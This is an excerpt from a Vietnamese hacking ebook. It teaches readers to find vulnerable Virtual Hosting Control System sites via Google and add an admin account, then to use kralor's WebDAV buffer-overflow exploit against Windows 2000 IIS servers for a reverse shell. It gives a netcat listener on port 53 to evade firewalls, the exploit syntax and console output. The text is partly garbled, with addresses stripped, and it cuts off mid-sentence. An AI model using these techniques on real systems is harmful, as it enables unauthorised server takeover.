Tham khảo tài liệu 'hacker professional ebook part 209', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | anh em đọc lại Code cho kỹ nhé bây giờ các bạn vào GOOGLE tìm với từ khóa Trích Virtual Hosting Control System đầu tiên là tạo File gì đó ví dụ cái này có thể đặt trên máy tính của bạn cũng đựoc ok rồi bây giờ thì nhập vào nhập vào link mà mình cần exploitx Trích kiểusitename admin ví dụ tôi chọn http . com admin add sau đó ấn Exploitx bạn sẽ được move về trang http login với user và pass mà bạn đã nhập chú ý là pass được mặc định đọc code cho kỹ bạn sẽ vào được ACP và bây giờ bạn có thể tạo RESLLER và nhiều thứ khác quá dễ phải không không nên phá quá bạn nhé ok trungthep vniss Kỹ thuật khai thác WebDAV Tác giả Seamoun - HVAonline 1 Mô tả Giao thức World Wide Web Distributed Authoring and Versioning WebDAV là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính 2 Khai thác Bạn sử dụng chương trình sau webdav của kralor có thể download lại địa chỉ Công việc chuẩn bị là download cái webdav đó về và đặt nc NETCAT ở chế độ lắng nghe ở máy tính dùng để tấn công. Ví dụ C nx -vv -l -p 53 listening on any 53 . Mục đích là listen ở cổng 53 là tưởng lửa không chặn cổng này Cú pháp webdav IP của máy chủ IIS IP của máy tính dùng để tấn công cổng lắng nghe padding 1 2 3. Ví dụ C webdav 53 1 Crpt exploit trough WebDAV by kralor Crpt undernet coromputer Checking WebDav on . FOUND exploiting through WebDav ret 0x00100010 Connecting. CONNECTED Sending evil request. SENT Now if you are lucky you will get a shell. Nếu như may mắn bạn có thể có shell của máy chủ IIS Công đoạn khai thác khi đã có shell Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có